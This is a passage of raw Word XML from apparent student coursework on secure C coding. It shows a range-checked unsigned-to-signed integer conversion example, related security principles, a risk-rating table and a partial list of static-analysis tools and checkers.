          <w:p w14:paraId="7E0C2F48" w14:textId="0D513D6B" w:rsidR="00F72634" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FE55C4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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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3FEC447" w:rsidR="00F72634" w:rsidRDefault="00512F6B" w:rsidP="00A72503">
            <w:r w:rsidRPr="00512F6B">
              <w:t>Validate ranges when converting from an unsigned type to a signed type. This compliant solution can be used to convert a value of unsigned long int type to a value of signed char type:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="71761811" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BD7E075" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>limits.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CACEA1" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2665E682" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E48D1E9" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  unsigned long int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = ULONG_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>MAX;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3AA99277" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  signed char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1664A943" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;= SCHAR_MAX) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBE3480" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = (signed </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>char)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;  /* Cast eliminates warning */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F0DF13" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  } else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AACE2C" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">    /* Handle error */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B42189" w14:textId="77777777" w:rsidR="00CC63E1" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4DA9C0" w14:textId="40775D69" w:rsidR="00F72634" w:rsidRDefault="00CC63E1" w:rsidP="00CC63E1">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A8644E7" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0E2E27" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Int_wPraLaHC"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>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404C1A" w14:textId="0B791B1A" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F879A3" w:rsidRPr="00F879A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00F879A3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B3746D" w:rsidRPr="00B3746D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Validate Input Data:</w:t>
            </w:r>
            <w:r w:rsidR="00B3746D" w:rsidRPr="00B3746D">
              <w:t xml:space="preserve"> Ensuring that integer conversions do not result in data loss or misinterpretation helps maintain data integrity, which is crucial for validating input data correctly.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD741FA" w14:textId="592A479F" w:rsidR="00B3746D" w:rsidRDefault="009A5D3E" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="00972DAE">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Heed Compiler Warnings</w:t>
            </w:r>
            <w:r w:rsidR="00972DAE">
              <w:t>: Compiler warnings often indicate potential issues with integer conversions, such as data loss or misinterpretation. Addressing these warnings helps prevent related security vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770D7F02" w14:textId="1ABDD9B4" w:rsidR="00972DAE" w:rsidRDefault="001B26B8" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">9. </w:t>
            </w:r>
            <w:r w:rsidR="00873877">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Use Effective Quality Assurance Techniques</w:t>
            </w:r>
            <w:r w:rsidR="00873877">
              <w:t>: Effective QA techniques can identify issues with integer conversions early in the development process, ensuring that such conversions do not lead to security vulnerabilities or functional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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03B2F214" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02FD9D0C" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="567E762D" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C888B9E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="2205D897" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00278D98" w14:textId="0610ADAF" w:rsidR="00B475A1" w:rsidRDefault="00201D72" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086FA0F7" w14:textId="0460E027" w:rsidR="00B475A1" w:rsidRDefault="00EE3345" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7EE5AB" w14:textId="07F9BC55" w:rsidR="00B475A1" w:rsidRDefault="00EE3345" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483DB358" w14:textId="0954F9F0" w:rsidR="00B475A1" w:rsidRDefault="00EE3345" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0216068C" w14:textId="7A08CF34" w:rsidR="00B475A1" w:rsidRDefault="00EE334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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B8AB6E4" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1397358D" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AEE2B48" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="300BC336" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8CDDEE" w14:textId="208946CA" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A2ABA7F" w14:textId="4D6D879A" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4441551B" w14:textId="6B3F777E" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196AC4C7" w14:textId="7DF7FF13" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Supported via MISRA C:2012 Rules 10.1, 10.3, 10.4, 10.6 and 10.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="5FE44A56" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4CBBF1" w14:textId="2E017DD4" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D2F7C5" w14:textId="0A4506A9" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="151D304D" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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LANG.CAST.PC.AV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.CAST.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PC.CONST</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2PTR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.CAST.PC.INT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD2C893" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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LANG.CAST.COERCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.CAST.VALUE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="006577A3" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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ALLOC.SIZE.TRUNC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MISC.MEM.SIZE.TRUNC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68783DFF" w14:textId="4FAB5F96" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.MEM.TBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C7EE03F" w14:textId="77777777"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Cast: arithmetic type/void pointer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Conversion: integer constant to pointer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Conversion: pointer/integer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6DC88D" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Coercion alters value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Cast alters value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B37FD8" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Truncation of allocation size</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Truncation of size</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EF3C2C" w14:textId="113C6B45" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tainted buffer access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="142FCAB9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5404A3BA" w14:textId="55EBFBD3" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Compass/ROSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5109F248" w14:textId="734460E6" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A09A96" w14:textId="2146524A" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
